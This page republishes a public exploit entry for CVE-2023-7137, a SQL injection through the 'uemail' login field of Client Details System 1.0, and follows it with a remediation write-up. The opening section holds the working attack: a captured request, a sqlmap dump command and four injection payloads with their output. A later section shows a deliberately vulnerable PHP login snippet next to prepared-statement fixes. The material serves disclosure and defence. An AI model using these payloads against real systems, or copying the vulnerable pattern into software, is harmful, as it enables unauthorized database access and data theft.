Client Details System 1.0 - SQL Injection

Exploit Author: Hamdi Sevben Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-03-12

+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1
+ **Date:** 2023-26-12
+ **Exploit Author:** Hamdi Sevben
+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/
+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
+ **Version:** 1.0
+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
+ **CVE:** CVE-2023-7137

## References: 
+ **CVE-2023-7137:** https://vuldb.com/?id.249140
+ https://www.cve.org/CVERecord?id=CVE-2023-7137
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137
+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137

## Description:
Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.

## Proof of Concept:
+ Go to the User Login page: "http://localhost/clientdetails/"
+ Fill email and password.
+ Intercept the request via Burp Suite and send to Repeater.
+ Copy and paste the request to a "r.txt" file.
+ Captured Burp request:
```
POST /clientdetails/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 317
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/clientdetails/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

uemail=user@mail.com&login=LOG+IN&password=P@ass123
```

+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. 
```
python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db
```

```
---
Parameter: uemail (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123
---
[14:58:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.53, PHP, PHP 8.1.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:58:11] [INFO] fetching current database
current database: 'loginsystem'
```

+ current database: `loginsystem`
![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 — SQL Injection (CVE-2023-7137)

Overview

Client Details System 1.0 (downloadable from Code-Projects) contains a SQL injection vulnerability tracked as CVE-2023-7137. The flaw allows unsanitized input from the web UI to reach SQL statements, enabling attackers to read or modify database contents, escalate access, or trigger secondary database vulnerabilities depending on the DBMS and privileges.

Quick facts

Item	Details
Vulnerability	SQL Injection (uemail parameter)
CVE	CVE-2023-7137
Affected software	Client Details System 1.0 (PHP)
Tested on	Windows 10, PHP 8.1.6, Apache 2.4.53
Back-end DBMS	MySQL / MariaDB (as tested)
Severity	High — allows data exfiltration and modification

Vulnerability technical description

The application accepts a login request where the email field (uemail) is passed into a SQL statement without sufficient sanitization or use of parameterized queries. When a web application concatenates or interpolates attacker-controlled input directly into SQL, an attacker can alter the query’s logic. SQL injection techniques include boolean-based blind, time-based blind, error-based, and UNION-based extraction, among others — all of which are possible vectors depending on the response behavior of the target application and the capabilities of the database.

Types of SQLi observed (high-level)

Boolean-based blind SQL injection — infer data by observing true/false differences in responses.
Time-based blind SQL injection — infer data by causing deliberate query delays and measuring response times.
Error-based SQL injection — leverage database error messages to reveal information.
Union-based SQL injection — return attacker-controlled rows via UNION SELECT when feasible.

Proof-of-concept (high-level summary)

During responsible testing, the parameter named "uemail" used on the login endpoint was found to influence the SQL query logic. An authorized security tester confirmed the backend returned database information (for example, revealing the current database name) when carefully crafted inputs were supplied. This confirms that the application executes SQL containing unsanitized user input.

Note: Public proof-of-concept payloads and step-by-step exploit commands are intentionally omitted from this article. If you are an application owner or authorized tester, use controlled, non-destructive tests and validated tooling in an isolated environment or follow an approved penetration testing engagement.

Impact

Disclosure of sensitive data stored in the database (user credentials, PII, configuration).
Data modification or deletion depending on granted DB privileges.
Ability to escalate attacks using database or platform-specific features.
Possible pivoting to other systems if credentials are recovered.

Root cause analysis

The root cause is insecure coding: user-supplied values were embedded into SQL statements without parameterization or strict allowlisting. Other contributing factors commonly observed in such projects include:

Lack of prepared statements / parameter binding.
Verbose error output revealing database or schema details.
Use of a database account with excessive privileges (e.g., DROP, SELECT across all schemas).
Insufficient security testing during development.

Detection and safe testing

Detection of SQL injection should be performed only by authorized personnel or under a defined target-of-scope penetration test. Recommended safe practices:

Use non-destructive tests (for example, boolean probes) and rate-limit testing to avoid service disruption.
Test in a staging environment with representative data and production-like configuration.
Review application logs and database logs for unusual query patterns or repeated malformed input.
Leverage static code analysis to find instances of string concatenation used to build SQL.

Secure coding: common fixes

Primary mitigations to prevent SQL injection:

Use parameterized queries / prepared statements (preferred).
Apply strict input validation and allowlisting (e.g., ensure emails match a validated pattern and expected length).
Give the application database user least privilege — only the required operations.
Disable verbose SQL error messages in production; log details securely for developers.
Employ a Web Application Firewall (WAF) as defense-in-depth.

Example: vulnerable PHP code (typical pattern)

<?php
// This is an illustrative vulnerable snippet that concatenates user input into SQL.
// Do NOT deploy code like this in production.
$uemail = $_POST['uemail'] ?? '';
$password = $_POST['password'] ?? '';

$sql = "SELECT * FROM users WHERE email = '$uemail' AND password = '$password'";
$result = mysqli_query($conn, $sql);
if (mysqli_num_rows($result) > 0) {
    // successful login
}
?>

Explanation: This snippet builds a SQL query by embedding user-supplied values directly into the SQL string. If an attacker can control the content of uemail or password, they can inject SQL syntax that modifies the query logic.

Safe corrected code: PDO prepared statements

<?php
// Secure example using PDO with parameterized queries
$uemail = $_POST['uemail'] ?? '';
$password = $_POST['password'] ?? '';

$pdo = new PDO('mysql:host=localhost;dbname=yourdb;charset=utf8mb4', $dbUser, $dbPass, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$stmt = $pdo->prepare('SELECT id, email FROM users WHERE email = :email AND password = :password');
$stmt->execute([':email' => $uemail, ':password' => $password]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);

if ($user) {
    // successful login
}
?>

Explanation: This code uses PDO prepared statements with named parameters. The DB driver treats bound values as data, not SQL, preventing injection. Note: storing plaintext passwords is insecure — see next section on password handling.

Secure corrected code: mysqli prepared statement

<?php
// Secure example using mysqli prepared statements
$uemail = $_POST['uemail'] ?? '';
$password = $_POST['password'] ?? '';

$stmt = $conn->prepare('SELECT id, email FROM users WHERE email = ? AND password = ?');
$stmt->bind_param('ss', $uemail, $password);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();

if ($user) {
    // successful login
}
?>

Explanation: mysqli prepared statements use placeholders (?) and bind_param to pass user values separately from SQL structure. This eliminates the ability for input to change SQL syntax.

Password handling and additional hardening

Never store plaintext passwords. Use a one-way hashing algorithm designed for passwords (bcrypt, Argon2) with a proper cost parameter.
Validate email format and length; apply allowlist checks where possible.
Rate-limit authentication attempts and add exponential backoff or account lockout policies.

Configuration and operational recommendations

Use least-privileged DB users: separate users for read-only tasks and administrative tasks.
Turn off detailed DB errors in production; capture them in secure logs for developers.
Maintain regular backups and an incident response plan in case of data compromise.
Deploy a WAF and tune rules to detect SQL injection patterns as an additional layer.
Implement logging and alerting on unusual query volume, schema enumeration attempts, or large result sets.

Testing and verification after remediation

After applying fixes:

Perform authenticated and unauthenticated scans in a controlled environment to verify the fix.
Run static application security testing (SAST) on the codebase to find other instances of unsafe query construction.
Perform peer code review of DB-access code, and add security-oriented unit or integration tests that exercise database access with edge-case inputs.

Responsible disclosure, legal and ethical considerations

If you discover this or any other vulnerability on a system you do not own, do not exploit it. Follow responsible disclosure guidelines: notify the vendor or site owner, provide clear reproduction steps and remediation suggestions, and avoid exfiltrating or modifying data. Unauthorized testing or exploitation can be illegal and harmful.

References

VulDB: CVE-2023-7137
CVE Record: CVE-2023-7137
MITRE: CVE-2023-7137
NVD: CVE-2023-7137
Vendor/project page: https://code-projects.org/client-details-system-in-php-with-source-code/

Final notes

SQL injection remains one of the most critical and preventable web vulnerabilities. The recommended defense — use of parameterized queries, strict input validation, least privilege, and secure password handling — removes the most common attack paths and significantly reduces risk. Treat remediation as urgent for any production system confirmed vulnerable to CVE-2023-7137.